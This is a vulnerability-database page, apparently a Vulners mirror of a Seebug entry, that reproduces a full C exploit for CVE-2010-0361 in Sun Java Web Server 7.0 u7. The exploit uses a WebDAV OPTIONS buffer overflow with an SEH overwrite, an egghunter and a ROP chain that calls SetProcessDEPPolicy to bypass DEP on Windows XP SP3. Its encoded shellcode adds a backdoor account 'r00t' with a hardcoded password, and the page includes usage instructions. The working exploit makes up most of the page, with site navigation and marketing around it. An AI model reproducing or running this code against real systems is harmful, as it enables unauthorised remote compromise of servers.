Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Sun Java Web Server 7.0 u7 - Exploit with DEP bypass

🗓️ 01 Jul 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 39 Views

Exploit for Sun Java Web Server 7.0 u7 bypassing DEP on Windows XP SP3 (CVE-2010-0361)

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Sun Microsystems Sun Java System Web Server remote exploit
3 Apr 201000:00
zdt
0day.today		Sun Java Web Sever 7.0 u7 Remote Exploit
3 Jul 201000:00
zdt
Circl		CVE-2010-0361
7 Aug 201000:00
circl
Check Point Advisories		Sun Java System Web Server WEBDAV Stack Buffer Overflow (CVE-2010-0361)
2 May 201000:00
checkpoint_advisories
CVE		CVE-2010-0361
20 Jan 201016:00
cve
Cvelist		CVE-2010-0361
20 Jan 201016:00
cvelist
Exploit DB		Sun Java Web Server 7.0 u7 - Remote Overflow
3 Jul 201000:00
exploitdb
Exploit DB		Sun Java Web Server 7.0 u7 - Remote Overflow (DEP Bypass)
9 Jul 201000:00
exploitdb
Exploit DB		Sun Java Web Server - System WebDAV OPTIONS Buffer Overflow (Metasploit)
7 Aug 201000:00
exploitdb
exploitpack		Sun Java Web Server 7.0 u7 - Remote Overflow (DEP Bypass)
9 Jul 201000:00
exploitpack
Rows per page

                                                # Exploit Title: [SJWSexv2]
# Date: [09/07/2010]
# Author: [dmc]
# Software Link: [download link if available]
# Version: [7.0 u7]
# Tested on: [Windows XP SP3 - with and without DEP]
# CVE : [CVE-2010-0361]

/* Sun Java Web Server Exploit v2
 *
 * Tested on:
 * Sun Java Web Server 7.0 update 7 - XP SP3
 * Ref: CVE-2010-0361
 *
 * This exploit is capable of bypassing DEP.
 * In order to do this it uses ROP to invoke
 * SetProcessDEPPolicy().
 *
 * Author: Dominic Chell <[email protected]>
 * Date: 08/07/2010
 */

#include "stdafx.h"
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
#include <string.h>
#include "winsock2.h"

#pragma comment(lib, "ws2_32")

#define usage(){(void)fprintf(stderr, "SJWSexv2 vs Sun Java Web Server 7.0 u7\n(C) dmc <[email protected]>\n\nUsage: sjwsex.exe [ip] [port] [directory]\nExample: sjwsex.exe 127.0.0.1 80 test\n");}
#define error(e){ (void)fprintf(stderr,"%s\n",e); return -1;}

// encoding the payloads in URL hex prevents it getting converted to unicode
char seh[] = "%90%80%02%10"; // 0x10028090 :  # ADD ESP,700 # RETN    [Module : ns-httpd40.dll]
char *nop = "%90"; // nop
char egghunter[] = "%66%81%CA%FF%0F%42%52%6A%02%58%CD%2E%3C%05%5A%74%EF%B8%77%30%30%74%8B%FA%AF%75%EA%AF%75%E7%FF%E7";
char *egg = "%77%30%30%74%77%30%30%74"; // w00tw00t
char *deadbeef = "%ef%be%ad%de";
char *ropayload = "%F2%C2%02%10" // 0x1002C2F2 :  # OR EAX,FFFFFFFF # POP EBX # RETN      [Module : ns-httpd40.dll]
				"%FF%FF%FF%FF" // put in to ebx
				"%4C%C1%02%10" // 0x1002C14C :  # INC EBX # XOR EAX,EAX # RETN  [Module : ns-httpd40.dll]
				"%E8%45%0D%10" // 0x100D45E8 :  # OR EAX,FFFFFFFF # POP EBP # RETN      [Module : ns-httpd40.dll]
				"%A4%22%86%7C" // 0x7C8622A4 SetProcessDEPPolicy, into EBP
				"%9D%31%08%10" // 0x1008319D :  # OR EAX,FFFFFFFF # POP EDI # RETN      [Module : ns-httpd40.dll]
				"%BF%13%01%10" // 0x100113BF :  # NOP # MOV EAX,DWORD PTR SS:[ESP+4] # MOV EAX,DWORD PTR DS:[EAX+14] # RETN       [Module : ns-httpd40.dll]
				"%BA%13%01%10" // 0x100113BA :  # POP ESI # RETN  [Module : ns-httpd40.dll]
				"%BF%13%01%10" // 0x100113BF :  # NOP # MOV EAX,DWORD PTR SS:[ESP+4] # MOV EAX,DWORD PTR DS:[EAX+14] # RETN       [Module : ns-httpd40.dll]
				"%0D%7C%0A%10"; // 0x100A7C0D :  # PUSHAD # RETN   [Module : ns-httpd40.dll]
// adduser r00t / r00tr00t123
char shellcode[] =
	"%89%e6%db%cd%d9%76%f4%58%50%59%49%49%49%49%43"
	"%43%43%43%43%43%51%5a%56%54%58%33%30%56%58%34"
	"%41%50%30%41%33%48%48%30%41%30%30%41%42%41%41"
	"%42%54%41%41%51%32%41%42%32%42%42%30%42%42%58"
	"%50%38%41%43%4a%4a%49%4b%4c%4d%38%4b%39%45%50"
	"%45%50%43%30%43%50%4d%59%4b%55%46%51%48%52%42"
	"%44%4c%4b%46%32%50%30%4c%4b%46%32%44%4c%4c%4b"
	"%51%42%44%54%4c%4b%42%52%46%48%44%4f%4f%47%51"
	"%5a%47%56%46%51%4b%4f%50%31%49%50%4e%4c%47%4c"
	"%43%51%43%4c%45%52%46%4c%47%50%49%51%48%4f%44"
	"%4d%43%31%48%47%4d%32%4c%30%46%32%46%37%4c%4b"
	"%50%52%44%50%4c%4b%47%32%47%4c%45%51%48%50%4c"
	"%4b%51%50%43%48%4d%55%49%50%44%34%51%5a%45%51"
	"%48%50%50%50%4c%4b%47%38%44%58%4c%4b%50%58%51"
	"%30%45%51%4e%33%4a%43%47%4c%51%59%4c%4b%47%44"
	"%4c%4b%45%51%4e%36%46%51%4b%4f%46%51%49%50%4e"
	"%4c%49%51%48%4f%44%4d%43%31%48%47%50%38%4b%50"
	"%43%45%4a%54%43%33%43%4d%4b%48%47%4b%43%4d%47"
	"%54%43%45%4a%42%46%38%4c%4b%50%58%46%44%45%51"
	"%48%53%42%46%4c%4b%44%4c%50%4b%4c%4b%50%58%45"
	"%4c%43%31%49%43%4c%4b%44%44%4c%4b%45%51%4e%30"
	"%4d%59%50%44%47%54%46%44%51%4b%51%4b%45%31%50"
	"%59%50%5a%46%31%4b%4f%4b%50%46%38%51%4f%50%5a"
	"%4c%4b%42%32%4a%4b%4b%36%51%4d%43%5a%43%31%4c"
	"%4d%4b%35%4e%59%45%50%43%30%43%30%46%30%43%58"
	"%46%51%4c%4b%42%4f%4d%57%4b%4f%48%55%4f%4b%4b"
	"%50%45%4d%46%4a%45%5a%45%38%49%36%4a%35%4f%4d"
	"%4d%4d%4b%4f%48%55%47%4c%45%56%43%4c%44%4a%4d"
	"%50%4b%4b%4d%30%42%55%44%45%4f%4b%50%47%42%33"
	"%42%52%42%4f%42%4a%43%30%46%33%4b%4f%4e%35%45"
	"%33%42%4d%45%34%46%4e%43%55%44%38%45%35%51%30"
	"%46%4f%43%53%47%50%42%4e%45%35%42%54%51%30%43"
	"%45%42%53%45%35%43%42%51%30%44%32%50%30%46%50"
	"%42%54%51%30%43%42%46%50%46%50%42%54%44%32%50"
	"%30%46%50%43%44%46%51%46%52%46%53%47%50%46%4f"
	"%51%51%50%44%51%54%47%50%51%36%46%46%51%30%42"
	"%4e%43%55%44%34%51%30%42%4c%42%4f%45%33%45%31"
	"%42%4c%43%57%43%42%42%4f%44%35%42%50%47%50%51"
	"%51%42%44%42%4d%45%39%42%4e%43%59%42%53%44%34"
	"%44%32%45%31%43%44%42%4f%43%42%42%53%51%30%42"
	"%52%46%50%46%50%42%54%51%30%46%4f%47%31%50%44"
	"%51%54%45%50%45%5a%41%41";

int send_buffer(int ipaddr, int port, char *buffer)
{
	SOCKET s;
	struct fd_set mask;
	struct timeval timeout; 
	struct sockaddr_in server;
	WSADATA info;
    if (WSAStartup(MAKEWORD(2,0), &info)) error("Unable to start WSA");

	s=socket(AF_INET,SOCK_STREAM,0);
	if (s==INVALID_SOCKET) error("[*] socket error");
	server.sin_family=AF_INET;
	server.sin_addr.s_addr=htonl(ipaddr);
	server.sin_port=htons(port);	

	WSAConnect(s,(struct sockaddr *)&server,sizeof(server),NULL,NULL,NULL,NULL);
	timeout.tv_sec=3;timeout.tv_usec=0;FD_ZERO(&mask);FD_SET(s,&mask);

	select(s+1,NULL,&mask,NULL,&timeout);
	if(FD_ISSET(s,&mask))
	{
			if (send(s,buffer,strlen(buffer),0)==SOCKET_ERROR) error("[*] error sending buffer\n");
			closesocket(s);
			return 0;
	}
}

int main(int argc, char *argv[])
{
	char *verb="GET /";
	char *options="OPTIONS /";
	char *version=" HTTP/1.0";
	char *directory="";
	char *payload, *ptr, *buffer;
	char nopsled1[1510], nopsled2[190], padding[400], padding2[210];
	
	if(argc < 4)
	{
		usage();
		return 0;
	}

	int ipaddr=htonl(inet_addr(argv[1])), port=atoi(argv[2]);
	directory = argv[3];
	fprintf(stderr, "SJWSexv2 vs Sun Java Web Server 7.0 u7\n(C) dmc <[email protected]>\n\n");

	int nopslen = 136 - strlen(directory);

	memset(nopsled1, 0x00, sizeof(nopsled1));
	for(int i=0;i<500;i++)
		strcat(nopsled1, nop);

	memset(padding, 0x00, sizeof(padding));
	for(int i=0;i<nopslen;i++)
		strcat(padding, nop);

	memset(nopsled2, 0x00, sizeof(nopsled2));
	for(int i=0;i<60;i++)
		strcat(nopsled2, nop);

	memset(padding2, 0x00, sizeof(padding2));
	for(int i=0; i<200; i++)
		padding2[i] = 'B';

	// build payload and place shellcode in memory
	payload = (char*)malloc(strlen(egg)+strlen(shellcode)+strlen(verb)+strlen(version)+2);
	memset(payload, 0x00, sizeof(payload));
	ptr=payload;
	
	memcpy(ptr, verb, strlen(verb));
	ptr+=strlen(verb);
	memcpy(ptr, egg, strlen(egg));
	ptr+=strlen(egg);
	memcpy(ptr, shellcode, strlen(shellcode));
	ptr+=strlen(shellcode);
	memcpy(ptr, version, strlen(version));
	ptr+=strlen(version);
	memcpy(ptr, "\n\0", 2);

	fprintf(stderr, "%s\n", "[*] Filling memory with shellcode");
	for (int i=0; i<4; i++)
	{
		send_buffer(ipaddr, port, payload);
	}

	// build final buffer and overwrite seh
	// [ OPTIONS / | DIRECTORY | PADDING | ROP | NOPS | EGGHUNTER | NOPSLED | SEH = PIVOT | PADDING | HTTPVERSION ]
	int len=0;
	// seh overwritten at 768
	len = strlen(options) + strlen(directory) + strlen(padding) + strlen(ropayload) + strlen(nopsled1);
	len = len + strlen(egghunter) + strlen(seh) + strlen(nopsled2) + strlen(padding2) + strlen(version) + 3;

	buffer=(char*)malloc(len);
	memset(buffer, 0x00, sizeof(buffer));
	ptr=buffer;
	
	memcpy(ptr, options, strlen(options));
	ptr+=strlen(options);
	memcpy(ptr, directory, strlen(directory));
	ptr+=strlen(directory);
	memcpy(ptr, "/", 1);
	ptr++;

	memcpy(ptr, padding, strlen(padding));
	ptr+=strlen(padding);

	memcpy(ptr, ropayload, strlen(ropayload));
	ptr+=strlen(ropayload);

	memcpy(ptr, nopsled2, strlen(nopsled2));
	ptr+=strlen(nopsled2);

	memcpy(ptr, egghunter, strlen(egghunter));
	ptr+=strlen(egghunter);

	memcpy(ptr, nopsled1, strlen(nopsled1));
	ptr+=strlen(nopsled1);

	memcpy(ptr, seh, strlen(seh));
	ptr+=strlen(seh);

	memcpy(ptr, padding2, strlen(padding2));
	ptr+=strlen(padding2);

	memcpy(ptr, version, strlen(version));
	ptr+=strlen(version);
	memcpy(ptr, "\n\n\0", 3);

	fprintf(stderr, "%s\n", "[*] Sending final buffer");
	send_buffer(ipaddr, port, buffer);
	fprintf(stderr, "%s\n", "[*] Wait several minutes and connect with r00t / r00tr00t123");

	return 0;
}

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
01 Jul 2014 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.88394
sun java web serverdep bypasswindows xp sp3exploit codecve-2010-0361rop techniquesecurity vulnerability
39